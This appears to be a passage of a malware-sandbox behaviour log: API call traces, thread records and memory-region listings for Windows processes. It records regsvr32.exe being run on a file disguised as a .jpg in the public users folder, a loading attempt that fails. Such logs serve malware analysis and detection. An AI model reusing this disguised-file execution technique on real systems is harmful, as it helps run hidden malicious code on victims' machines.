[0090.962] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x175c28 | out: hHeap=0x110000) returned 1
[0090.963] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17d968 | out: hHeap=0x110000) returned 1
[0090.963] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x68) returned 0x1545c0
[0090.963] IUnknown:AddRef (This=0x13be24) returned 0xe
[0090.963] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x1a8) returned 0x17d968
[0090.963] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24dfe64 | out: lpCPInfo=0x24dfe64) returned 1
[0090.963] IUnknown:AddRef (This=0x1467f8) returned 0x4
[0090.963] IUnknown:AddRef (This=0x13be24) returned 0xf
[0090.963] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x24dfe6c | out: ppvObject=0x24dfe6c*=0x13be24) returned 0x0
[0090.963] IUnknown:Release (This=0x13be24) returned 0xf
[0090.964] IUnknown:AddRef (This=0x13be24) returned 0x10
[0090.964] IUri:GetScheme (in: This=0x13be24, pdwScheme=0x24dfe70 | out: pdwScheme=0x24dfe70*=0x9) returned 0x0
[0090.964] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8006) returned 0x159020
[0090.964] IUnknown:Release (This=0x13be24) returned 0xf
[0090.964] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1006) returned 0x175c28
[0090.964] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x4000) returned 0x1de7f8
[0090.965] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1de7f8 | out: hHeap=0x110000) returned 1
[0090.965] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x108) returned 0x1c10c8
[0090.965] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x927c0) returned 0x0
[0091.245] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x927c0) returned 0x0
[0091.561] CoUninitialize ()
[0091.561] FreeLibraryAndExitThread (hLibModule=0x73870000, dwExitCode=0x0)
[0091.563] GetCurrentThreadId () returned 0xe94
Thread:
id = 32
os_tid = 0xe98
[0080.632] GetCurrentThreadId () returned 0xe98
Thread:
id = 33
os_tid = 0xe9c
[0080.708] GetCurrentThreadId () returned 0xe9c
Thread:
id = 34
os_tid = 0xea0
[0080.709] GetCurrentThreadId () returned 0xea0
Thread:
id = 36
os_tid = 0xeb0
[0087.145] GetCurrentThreadId () returned 0xeb0
Thread:
id = 37
os_tid = 0xeb4
[0087.192] GetCurrentThreadId () returned 0xeb4
Thread:
id = 38
os_tid = 0xeb8
[0087.545] GetCurrentThreadId () returned 0xeb8
Thread:
id = 39
os_tid = 0xebc
[0088.511] GetCurrentThreadId () returned 0xebc
Thread:
id = 40
os_tid = 0xec4
[0090.262] GetCurrentThreadId () returned 0xec4
[0090.954] GetCurrentThreadId () returned 0xec4
Process:
id = "5"
image_name = "regsvr32.exe"
filename = "c:\\windows\\syswow64\\regsvr32.exe"
page_root = "0x3e623000"
os_pid = "0xec8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "4"
os_parent_pid = "0xe80"
cmd_line = "\"C:\\Windows\\System32\\regsvr32.exe\" c:\\users\\public\\gigabyteI7.jpg"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1156
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1157
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1158
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1159
start_va = 0x50000
end_va = 0x8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1160
start_va = 0x90000
end_va = 0x96fff
monitored = 1
entry_point = 0x927c1
region_type = mapped_file
name = "regsvr32.exe"
filename = "\\Windows\\SysWOW64\\regsvr32.exe" (normalized: "c:\\windows\\syswow64\\regsvr32.exe")
Region:
id = 1161
start_va = 0xa0000
end_va = 0xa3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000a0000"
filename = ""
Region:
id = 1162
start_va = 0xb0000
end_va = 0xb1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000b0000"
filename = ""
Region:
id = 1163
start_va = 0x120000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 1164
start_va = 0x77800000
end_va = 0x779a8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1165
start_va = 0x779e0000
end_va = 0x77b5ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1166
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1167
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1168
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1169
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1170
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1171
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1172
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1173
start_va = 0x180000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1174
start_va = 0x75250000
end_va = 0x75257fff
monitored = 0
entry_point = 0x752520f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1175
start_va = 0x75260000
end_va = 0x752bbfff
monitored = 0
entry_point = 0x7529f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1176
start_va = 0x752c0000
end_va = 0x752fefff
monitored = 0
entry_point = 0x752ee088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1177
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 0
entry_point = 0x776f5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1178
start_va = 0x769b0000
end_va = 0x76abffff
monitored = 0
entry_point = 0x769c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1179
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 0
entry_point = 0x776f5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1180
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000776e0000"
filename = ""
Region:
id = 1181
start_va = 0x775e0000
end_va = 0x776d9fff
monitored = 0
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1182
start_va = 0x775e0000
end_va = 0x776d9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000775e0000"
filename = ""
Region:
id = 1183
start_va = 0x200000
end_va = 0x31ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1184
start_va = 0x769b0000
end_va = 0x76abffff
monitored = 0
entry_point = 0x769c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1185
start_va = 0x76fe0000
end_va = 0x77026fff
monitored = 0
entry_point = 0x76fe74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1186
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1187
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1188
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1189
start_va = 0x320000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1190
start_va = 0x76c20000
end_va = 0x76cbffff
monitored = 0
entry_point = 0x76c349e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1191
start_va = 0x76cc0000
end_va = 0x76d6bfff
monitored = 0
entry_point = 0x76cca472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1192
start_va = 0x76900000
end_va = 0x76918fff
monitored = 0
entry_point = 0x76904975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1193
start_va = 0x75bc0000
end_va = 0x75caffff
monitored = 0
entry_point = 0x75bd0569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1194
start_va = 0x75530000
end_va = 0x7558ffff
monitored = 0
entry_point = 0x7554a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1195
start_va = 0x75520000
end_va = 0x7552bfff
monitored = 0
entry_point = 0x755210e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1196
start_va = 0x773b0000
end_va = 0x774affff
monitored = 0
entry_point = 0x773cb6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1197
start_va = 0x77240000
end_va = 0x772cffff
monitored = 0
entry_point = 0x77256343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1198
start_va = 0x75780000
end_va = 0x75789fff
monitored = 0
entry_point = 0x757836a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 1199
start_va = 0x76ac0000
end_va = 0x76b5cfff
monitored = 0
entry_point = 0x76af3fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 1200
start_va = 0x76e80000
end_va = 0x76fdbfff
monitored = 0
entry_point = 0x76ecba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1201
start_va = 0x745f0000
end_va = 0x7478dfff
monitored = 0
entry_point = 0x7461e6b5
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 1202
start_va = 0x771d0000
end_va = 0x77226fff
monitored = 0
entry_point = 0x771e9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1203
start_va = 0x390000
end_va = 0x54ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 1204
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1205
start_va = 0x390000
end_va = 0x517fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 1206
start_va = 0x540000
end_va = 0x54ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 1207
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1208
start_va = 0x76b90000
end_va = 0x76beffff
monitored = 0
entry_point = 0x76ba158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1209
start_va = 0x774b0000
end_va = 0x7757bfff
monitored = 0
entry_point = 0x774b168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1210
start_va = 0x550000
end_va = 0x6d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1211
start_va = 0x6e0000
end_va = 0x1adffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006e0000"
filename = ""
Region:
id = 1212
start_va = 0x20000
end_va = 0x21fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "regsvr32.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\regsvr32.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\regsvr32.exe.mui")
Region:
id = 1213
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1214
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1215
start_va = 0xd0000
end_va = 0xd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1216
start_va = 0xe0000
end_va = 0xe1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1217
start_va = 0x74460000
end_va = 0x744dffff
monitored = 0
entry_point = 0x744737c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1218
start_va = 0x1ae0000
end_va = 0x1b9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ae0000"
filename = ""
Region:
id = 1222
start_va = 0x1ba0000
end_va = 0x1c7efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ba0000"
filename = ""
Region:
id = 1223
start_va = 0xf0000
end_va = 0x10ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1224
start_va = 0x74170000
end_va = 0x7419efff
monitored = 0
entry_point = 0x7417c7a2
region_type = mapped_file
name = "duser.dll"
filename = "\\Windows\\SysWOW64\\duser.dll" (normalized: "c:\\windows\\syswow64\\duser.dll")
Region:
id = 1225
start_va = 0x1d90000
end_va = 0x1dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d90000"
filename = ""
Region:
id = 1226
start_va = 0x1e80000
end_va = 0x1ebffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e80000"
filename = ""
Region:
id = 1227
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 1228
start_va = 0x74410000
end_va = 0x74422fff
monitored = 0
entry_point = 0x74411d3f
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 1229
start_va = 0xd0000
end_va = 0xd4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui")
Region:
id = 1230
start_va = 0x1ae0000
end_va = 0x1b5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ae0000"
filename = ""
Region:
id = 1231
start_va = 0x1b60000
end_va = 0x1b9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b60000"
filename = ""
Region:
id = 1232
start_va = 0x741c0000
end_va = 0x741eefff
monitored = 0
entry_point = 0x741c1142
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll")
Region:
id = 1233
start_va = 0x757f0000
end_va = 0x7587efff
monitored = 0
entry_point = 0x757f3fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1234
start_va = 0x110000
end_va = 0x110fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "duser.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\duser.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\duser.dll.mui")
Region:
id = 1235
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 1236
start_va = 0x1ec0000
end_va = 0x218efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1237
start_va = 0x170000
end_va = 0x172fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "comctl32.dll.mui"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui")
Region:
id = 1238
start_va = 0x2190000
end_va = 0x34e4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll")
Region:
id = 1239
start_va = 0x200000
end_va = 0x200fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui")
Region:
id = 1240
start_va = 0x220000
end_va = 0x31ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 1241
start_va = 0x1c80000
end_va = 0x1d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c80000"
filename = ""
Region:
id = 1242
start_va = 0x34f0000
end_va = 0x3e1ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 1243
start_va = 0x210000
end_va = 0x210fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Thread:
id = 41
os_tid = 0xecc
[0091.250] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15ff64 | out: lpSystemTimeAsFileTime=0x15ff64*(dwLowDateTime=0x8dab7560, dwHighDateTime=0x1d7fe3c))
[0091.250] GetCurrentProcessId () returned 0xec8
[0091.251] GetCurrentThreadId () returned 0xecc
[0091.251] GetTickCount () returned 0x1448cd7
[0091.251] QueryPerformanceCounter (in: lpPerformanceCount=0x15ff5c | out: lpPerformanceCount=0x15ff5c*=2142480867404) returned 1
[0091.251] GetStartupInfoW (in: lpStartupInfo=0x15ff04 | out: lpStartupInfo=0x15ff04*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x5f5e100, hStdOutput=0x0, hStdError=0x15ff6c))
[0091.251] GetModuleHandleA (lpModuleName=0x0) returned 0x90000
[0091.251] __set_app_type (_Type=0x2)
[0091.251] __p__fmode () returned 0x76d631f4
[0091.251] __p__commode () returned 0x76d631fc
[0091.251] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x92873) returned 0x0
[0091.251] __wgetmainargs (in: _Argc=0x943f8, _Argv=0x94400, _Env=0x943fc, _DoWildCard=0, _StartInfo=0x9440c | out: _Argc=0x943f8, _Argv=0x94400, _Env=0x943fc) returned 0
[0091.252] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0091.252] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x22, ProcessInformation=0x15f27c, ProcessInformationLength=0x4) returned 0xc0000022
[0091.252] lstrlenW (lpString="c:\\users\\public\\gigabyteI7.jpg") returned 30
[0091.252] OleInitialize (pvReserved=0x0) returned 0x0
[0091.367] _wsplitpath_s (in: _FullPath="c:\\users\\public\\gigabyteI7.jpg", _Drive=0x0, _DriveCount=0x0, _Dir=0x0, _DirCount=0x0, _Filename=0x0, _FilenameCount=0x0, _Ext=0x15ec60, _ExtCount=0x100 | out: _Drive=0x0, _Dir=0x0, _Filename=0x0, _Ext=".jpg") returned 0x0
[0091.367] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".jpg", ulOptions=0x0, samDesired=0x1, phkResult=0x15ea5c | out: phkResult=0x15ea5c*=0xb6) returned 0x0
[0091.368] RegQueryValueW (in: hKey=0xb6, lpSubKey=0x0, lpData=0x15ea60, lpcbData=0x15ea58 | out: lpData="jpegfile", lpcbData=0x15ea58) returned 0x0
[0091.368] RegCloseKey (hKey=0xb6) returned 0x0
[0091.368] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="jpegfile", ulOptions=0x0, samDesired=0x1, phkResult=0x15ea5c | out: phkResult=0x15ea5c*=0xb6) returned 0x0
[0091.368] RegOpenKeyExW (in: hKey=0xb6, lpSubKey="AutoRegister", ulOptions=0x0, samDesired=0x1, phkResult=0x15ea50 | out: phkResult=0x15ea50*=0x0) returned 0x2
[0091.368] RegCloseKey (hKey=0xb6) returned 0x0
[0091.368] SetErrorMode (uMode=0x1) returned 0x0
[0091.369] LoadLibraryExW (lpLibFileName="c:\\users\\public\\gigabyteI7.jpg", hFile=0x0, dwFlags=0x8) returned 0x0
[0091.370] SetErrorMode (uMode=0x0) returned 0x1
[0091.370] GetLastError () returned 0xc1
[0091.370] GetCommandLineW () returned="\"C:\\Windows\\System32\\regsvr32.exe\" c:\\users\\public\\gigabyteI7.jpg"
[0091.371] CreateFileW (lpFileName="c:\\users\\public\\gigabyteI7.jpg" (normalized: "c:\\users\\public\\gigabytei7.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4
[0091.371] ReadFile (in: hFile=0xb4, lpBuffer=0x15eb78, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x15eb74, lpOverlapped=0x0 | out: lpBuffer=0x15eb78*, lpNumberOfBytesRead=0x15eb74*=0x40, lpOverlapped=0x0) returned 1
[0091.372] CloseHandle (hObject=0xb4) returned 1
[0091.372] LoadStringW (in: hInstance=0x90000, uID=0xd, lpBuffer=0x15de4c, cchBufferMax=1024 | out: lpBuffer="The module \"%1\" may not compatible with the version of Windows that you're running. Check if the module is compatible with an x86 (32-bit) or x64 (64-bit) version of regsvr32.exe.") returned 0xb3
[0091.373] lstrlenW (lpString="c:\\users\\public\\gigabyteI7.jpg") returned 30
[0091.373] wcscpy_s (in: _Destination=0x15e664, _SizeInWords=0x3f4, _Source="c:\\users\\public\\gigabyteI7.jpg" | out: _Destination="c:\\users\\public\\gigabyteI7.jpg") returned 0x0
[0091.373] lstrlenW (lpString="c:\\users\\public\\gigabyteI7.jpg") returned 30
[0091.373] GetModuleHandleW (lpModuleName="user32.dll") returned 0x773b0000
[0091.373] GetProcAddress (hModule=0x773b0000, lpProcName="SetProcessDPIAware") returned 0x773cfcb8
[0091.373] SetProcessDPIAware () returned 1
[0091.373] TaskDialog (in: hwndOwner=0x0, hInstance=0x0, pszWindowTitle="RegSvr32", pszMainInstruction=0x0, pszContent="The module \"c:\\users\\public\\gigabyteI7.jpg\" may not compatible with the version of Windows that you're running. Check if the module is compatible with an x86 (32-bit) or x64 (64-bit) version of regsvr32.exe.", dwCommonButtons=0x1, pszIcon=0xfffe, pnButton=0x15de48 | out: pnButton=0x15de48) returned 0x0
[0098.239] OleUninitialize ()
[0098.240] exit (_Code=3)
Thread:
id = 42
os_tid = 0xed0
Process:
id = "6"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0xa35b000"
os_pid = "0x360"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "1"
os_parent_pid = "0x1c8"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
